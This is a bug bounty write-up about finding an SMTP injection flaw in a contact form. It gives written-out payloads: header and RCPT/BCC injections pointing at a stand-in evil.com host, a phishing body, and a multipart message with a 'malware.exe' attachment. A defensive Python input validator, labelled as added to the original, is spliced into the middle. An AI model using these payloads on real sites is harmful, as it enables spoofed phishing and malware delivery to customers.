How I Found an SMTP Injection Bug & Earned $800 in Just 30 Minutes!

Bug bounty hunting is full of surprises, and sometimes, the easiest vulnerabilities can pay the most. This is the story of how I stumbled upon an SMTP Injection bug, reported it, and earned $800 in just half an hour. I’ll also share the exact techniques, tools, and payloads I used so you can try it yourself!
The Target: A Well-Known Company with a Contact Form
Like any other day, I was doing reconnaissance, scanning for potential targets. I found a large e-commerce website that had an email-based contact form.
Here’s what I noticed:
- The contact form had fields for Name, Email, Subject, and Message.
- It sent an automated confirmation email once submitted.
- The email address I entered was reflected in the email body.
Immediately, my hacker instincts kicked in — what if the input was vulnerable to SMTP Injection?
Step 1: Advanced Reconnaissance Techniques
To maximize my chances of finding vulnerabilities, I used the following reconnaissance techniques:
1. Searching for Email-Based Forms
I used Google Dorking to find email-based contact forms:
inurl:/contact.php OR inurl:/feedback.php "email" site:target.com
2. Checking for Email Reflection in Responses
Using Burp Suite, I intercepted the request and tested whether the email field was reflected in the response:
GET /contact?email=test@example.com HTTP/1.1
Host: target.com
If the email address appeared in the response, that was a sign of potential SMTP Injection or Email Spoofing.
Step 2: Testing for SMTP Injection
I submitted a normal test message to see what the email looked like. Then, I injected an SMTP payload into the email field:
victim@example.com
RCPT TO: attacker@evil.com
A few seconds later, I received two emails — one at my original email and another at my attacker-controlled email.
💡 Bingo! The server was accepting additional SMTP commands!
Step 3: Exploiting for Maximum Impact
To check the severity, I tried a more advanced payload to manipulate the email structure and send messages on behalf of the company:
"attacker@example.com\nBCC: masslist@spam.com\nSubject: URGENT Security Alert!\nBody: Your account has been compromised. Click here to secure it: https://evil.com"
This spoofed an email that appeared to come directly from the company. If an attacker abused this, they could send phishing emails to thousands of customers!
Advanced Exploitation: Sending Malicious Attachments
I wanted to see if I could inject attachments into emails to increase the impact.
From: "support@target.com"
To: victim@example.com
Subject: Urgent Action Required
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

Your account is compromised! Click below to verify: https://evil.com
--XYZ
Content-Type: application/octet-stream; name="malware.exe"
Content-Disposition: attachment; filename="malware.exe"

[malicious binary content]
--XYZ--
This payload would attach a malware file to the email, making it a high- to critical-severity vulnerability.
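The fix side, as an added example that is not part of the original post: a Python contact-form handler that refuses any field containing the CR, LF or NUL characters every payload above depends on, and accepts only a single bare address for the email field. The sender address, function names and sample inputs are my own assumptions, not the target's code.

```python
import re
from email.message import EmailMessage
from email.utils import parseaddr
from typing import Optional

# CR, LF and NUL let a form value break out of its header (or SMTP command)
# line; the "\nRCPT TO:" and "\nBCC:" payloads above all rely on them.
_BREAKOUT = re.compile(r"[\r\n\x00]")
# Deliberately strict shape for one bare address: no display name,
# no comma-separated list, no angle brackets.
_ADDR = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")

def is_injected(value: str) -> bool:
    """True if the value could terminate a header line or SMTP command."""
    return _BREAKOUT.search(value) is not None

def validate_email(value: str) -> Optional[str]:
    """Return the address if it is exactly one clean bare address, else None."""
    if is_injected(value) or len(value) > 254:
        return None
    stripped = value.strip()
    _, addr = parseaddr(stripped)
    if addr != stripped or not _ADDR.fullmatch(addr):
        return None  # display name, list or malformed: reject, never repair
    return addr

def validate_header(value: str, max_len: int = 200) -> Optional[str]:
    """Single-line header text (Name, Subject): reject line breaks, cap length."""
    if is_injected(value) or len(value) > max_len:
        return None
    return value.strip()

def build_confirmation(name: str, email: str, subject: str, body: str) -> EmailMessage:
    """Build the auto-reply, raising ValueError instead of sending on bad input."""
    to_addr = validate_email(email)
    safe_name = validate_header(name)
    safe_subject = validate_header(subject)
    if to_addr is None or safe_name is None or safe_subject is None:
        raise ValueError("contact form input rejected")
    msg = EmailMessage()
    msg["From"] = "noreply@contact-form.example"  # fixed sender, never user input
    msg["To"] = to_addr
    msg["Subject"] = "Re: " + safe_subject
    # The body is free text: set_content() encodes it as a single text/plain
    # part, so "--XYZ" or "Content-Type:" lines inside it stay inert text.
    msg.set_content(f"Hi {safe_name},\n\nWe received your message:\n\n{body}\n")
    return msg
```

Because the To field is validated before the message is built, a "\nBCC:" or "\nRCPT TO:" suffix never reaches the mail library or the SMTP session.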
Step 4: Reporting the Bug & Getting Paid
I quickly drafted a professional report and submitted it to their bug bounty program on HackerOne.
Bug Report Summary
- Vulnerability: SMTP Injection in Contact Form
- Impact: Allows email spoofing, phishing, unauthorized email sending, and malware injection
- Steps to Reproduce: Provided multiple payloads and email logs
- Proof of Concept Video: Attached a screen recording showing real-time exploitation
Within 30 minutes, I got a response from their security team:
🚀 “We have verified the issue and marked it as HIGH severity. Expect a payout soon.”
A day later, I received $800 in my HackerOne account! 🎉
Lessons Learned & Takeaways
- Always check email-based forms — They are often vulnerable to SMTP Injection.
- Try multiple payloads — Even if a basic test fails, an advanced payload might work.
- Increase impact — Companies pay more for vulnerabilities that pose real-world threats.
- Bug bounty is about creativity — Sometimes, simple bugs turn into big rewards.
- SMTP Injection can escalate — By injecting attachments, you can turn a medium bug into a critical one.
Want More Bug Bounty Success Stories?
📖 Medium Blog: TheIndianNetwork
📺 YouTube Channel: TheIndianNetwork
📧 Email: theindiannetwork@protonmail.com
💰 Go hunt, find a bug, and make money today!